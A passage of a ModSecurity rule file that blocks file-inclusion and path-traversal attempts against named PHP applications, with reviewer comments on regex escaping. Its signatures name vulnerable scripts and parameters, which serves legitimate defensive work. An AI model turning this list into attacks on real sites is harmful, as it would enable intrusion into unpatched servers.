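remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion
# Three-step chain: request line contains /header.php, request line contains "GET ",
# and the theme_directory argument contains "../". Because of the second step the
# check is only made for requests whose request line carries the text "GET ".
# NOTE(review): the last rule of the chain lists no transformation of its own; confirm
# that the intended path normalisation is applied to ARGS:theme_directory here.
SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009380,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009903,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:forumspath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:forumspath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /rss_importer_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009167,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33698'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:sitepath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptCMS Lite rss_importer_functions.php sitepath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009382) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /admin/frontpage_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009382,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31959'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:loadadminpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Agares Media ThemeSiteScript frontpage_right.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010362) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /install/di.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010362,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule &TX:'/RFI.*ARGS:pathtoserverdata/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AjaxPortal di.php pathtoserverdata Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010198) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion
# The TX selector is a regular expression, so the brackets around "currentskin" are
# escaped to match the parameter name master[currentskin] literally. Unescaped,
# [currentskin] is a character class matching a single letter, and the selector cannot
# match a variable recorded under the name ARGS:master[currentskin].
SecRule REQUEST_LINE "@contains /include/_bot.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010198,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:master\[currentskin\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Autonomous LAN Party _bot.php master Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009165) SpiderLabs Research (SLR) Public Vulns: ET 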
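WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /LSTable.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009165,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31419'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:class_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Barcode Generator LSTable.php class_dir parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion
# Here the argument is selected by its plain name (no slashes around it), so the
# brackets in mj_config[src_path] are not part of a regular expression.
SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009195,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mj_config[src_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009196) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion
# The TX selector below is a regular expression, so the brackets around "src_path" are
# escaped to match the parameter name mj_config[src_path] literally. Unescaped,
# [src_path] is a character class matching a single character, and the selector cannot
# match a variable recorded under the name ARGS:mj_config[src_path].
SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009196,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mj_config\[src_path\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Remote File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003738) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath
# This chain looks only at argument names: the pattern is case-insensitive and
# unanchored, so any argument whose name contains "languagePath" satisfies it, whatever
# its value.
SecRule REQUEST_LINE "@contains /language/1/splash.lang.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003738,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3909'"
    SecRule ARGS_NAMES "(?i:languagePath)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Beacon Remote Inclusion Attempt -- splash.lang.php languagePath',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009364) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /linkadmin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009364,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34129'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File 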
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot SecRule REQUEST_LINE "@contains /berylium-classes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003677,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3869'" SecRule ARGS_NAMES "(?i:beryliumroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Berylium2 Remote Inclusion Attempt -- berylium-classes.php beryliumroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009417,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_down[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_top.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009418,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_top[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_left.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009420,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_left[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009421,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_right[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus 
block_right.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009422,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009423,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009370) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion SecRule REQUEST_LINE "@contains /HTMLSax3.php" 
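"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009370,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # The TX selector between the slashes is a regular expression, so an
    # unescaped "[plugins]" is a character class (one of p,l,u,g,i,n,s), not
    # the literal parameter name "dir[plugins]". Unescaped, this chain could
    # never match the parameter it is written for. The brackets are escaped so
    # the selector matches the TX key recorded for ARGS:dir[plugins].
    # NOTE(review): the TX key is presumably set by the generic RFI rules that
    # run before this file; confirm with a regression test on your build.
    SecRule &TX:'/RFI.*ARGS:dir\[plugins\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin HTMLSax3.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion
# Chain: request line contains the script path, the method is GET, and at
# least one TX variable exists whose name matches the RFI selector below.
# The brackets in "dir[plugins]" are escaped so they are matched literally
# instead of being read as a regex character class.
SecRule REQUEST_LINE "@contains /safehtml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009371,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:dir\[plugins\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin safehtml.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /inc/content.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009372,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30136'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:sIncPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin content.inc.php 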
Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /spaw_control.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009429,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30042'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:spaw_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX SecRule REQUEST_LINE "@contains /mtdialogo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003726,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- mtdialogo.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003727) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX SecRule REQUEST_LINE "@contains /ltdialogo.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003727,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- ltdialogo.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003729,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- login.php pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php pathCGX SecRule REQUEST_LINE "@contains /inc/logingecon.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003728,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php pathCGX',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3874'" SecRule &TX:'/RFI.*ARGS:pathCGX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CGX Remote Inclusion Attempt -- logingecon.php 
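pathCGX',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003737) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir
# Chain: request line contains the script path and at least one TX variable
# exists whose name matches the RFI selector for the g_pcltar_lib_dir argument.
SecRule REQUEST_LINE "@contains /pcltrace.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003737,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3915'"
    SecRule &TX:'/RFI.*ARGS:g_pcltar_lib_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CJG Explorer Remote Inclusion Attempt -- pcltrace.lib.php g_pcltar_lib_dir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion
# The TX selector between the slashes is a regular expression. Unescaped,
# "[mosConfig_absolute_path]" is a character class, so the selector would not
# match the literal parameter name "GLOBALS[mosConfig_absolute_path]" and the
# chain could not fire for it. The brackets are escaped to match literally.
# NOTE(review): confirm with a regression test against your ModSecurity build.
SecRule REQUEST_LINE "@contains /install.clickheat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009754,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[mosConfig_absolute_path\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009755) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1 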
SecRule REQUEST_LINE "@contains /heatmap/_main.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009755,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009756) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2 SecRule REQUEST_LINE "@contains /heatmap/main.php" 